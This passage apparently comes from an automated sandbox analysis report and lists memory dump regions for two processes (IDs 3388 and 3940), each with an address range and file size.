                                                                  1.1MB

                                                                • memory/3388-72-0x000002CA4EC70000-0x000002CA4EFE5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/3388-73-0x00007FFC566C0000-0x00007FFC56A35000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/3388-74-0x00007FFC5DEF0000-0x00007FFC5DF14000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/3388-66-0x00007FFC5A040000-0x00007FFC5A06E000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                • memory/3388-62-0x00007FFC5CBE0000-0x00007FFC5CBF9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3388-60-0x00007FFC59670000-0x00007FFC597E3000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                • memory/3388-280-0x00007FFC5A040000-0x00007FFC5A06E000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                • memory/3388-58-0x00007FFC5CC00000-0x00007FFC5CC23000-memory.dmp

                                                                  Filesize

                                                                  140KB

                                                                • memory/3388-56-0x00007FFC5F2F0000-0x00007FFC5F309000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3388-29-0x00007FFC5DEF0000-0x00007FFC5DF14000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/3388-248-0x00007FFC62750000-0x00007FFC6275D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3388-138-0x00007FFC5CC00000-0x00007FFC5CC23000-memory.dmp

                                                                  Filesize

                                                                  140KB

                                                                • memory/3388-282-0x000002CA4EC70000-0x000002CA4EFE5000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/3388-283-0x00007FFC566C0000-0x00007FFC56A35000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/3388-244-0x00007FFC5CBE0000-0x00007FFC5CBF9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3388-71-0x00007FFC595B0000-0x00007FFC59668000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                • memory/3388-70-0x00007FFC47C90000-0x00007FFC48278000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/3388-64-0x00007FFC62750000-0x00007FFC6275D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3388-32-0x00007FFC62990000-0x00007FFC6299F000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                • memory/3388-25-0x00007FFC47C90000-0x00007FFC48278000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/3388-292-0x00007FFC5DEF0000-0x00007FFC5DF14000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/3388-291-0x00007FFC47C90000-0x00007FFC48278000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/3388-305-0x00007FFC59490000-0x00007FFC595AC000-memory.dmp

                                                                  Filesize

                                                                  1.1MB

                                                                • memory/3388-297-0x00007FFC59670000-0x00007FFC597E3000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                • memory/3388-306-0x00007FFC47C90000-0x00007FFC48278000-memory.dmp

                                                                  Filesize

                                                                  5.9MB

                                                                • memory/3388-326-0x00007FFC5CC00000-0x00007FFC5CC23000-memory.dmp

                                                                  Filesize

                                                                  140KB

                                                                • memory/3388-332-0x00007FFC5CBC0000-0x00007FFC5CBD4000-memory.dmp

                                                                  Filesize

                                                                  80KB

                                                                • memory/3388-333-0x00007FFC566C0000-0x00007FFC56A35000-memory.dmp

                                                                  Filesize

                                                                  3.5MB

                                                                • memory/3388-331-0x00007FFC595B0000-0x00007FFC59668000-memory.dmp

                                                                  Filesize

                                                                  736KB

                                                                • memory/3388-330-0x00007FFC5A040000-0x00007FFC5A06E000-memory.dmp

                                                                  Filesize

                                                                  184KB

                                                                • memory/3388-329-0x00007FFC62750000-0x00007FFC6275D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3388-328-0x00007FFC5CBE0000-0x00007FFC5CBF9000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3388-327-0x00007FFC59670000-0x00007FFC597E3000-memory.dmp

                                                                  Filesize

                                                                  1.4MB

                                                                • memory/3388-325-0x00007FFC5F2F0000-0x00007FFC5F309000-memory.dmp

                                                                  Filesize

                                                                  100KB

                                                                • memory/3388-324-0x00007FFC5CC30000-0x00007FFC5CC5D000-memory.dmp

                                                                  Filesize

                                                                  180KB

                                                                • memory/3388-323-0x00007FFC62990000-0x00007FFC6299F000-memory.dmp

                                                                  Filesize

                                                                  60KB

                                                                • memory/3388-322-0x00007FFC5DEF0000-0x00007FFC5DF14000-memory.dmp

                                                                  Filesize

                                                                  144KB

                                                                • memory/3388-321-0x00007FFC5CA50000-0x00007FFC5CA5D000-memory.dmp

                                                                  Filesize

                                                                  52KB

                                                                • memory/3940-184-0x000001297D340000-0x000001297D348000-memory.dmp

                                                                  Filesize

                                                                  32KB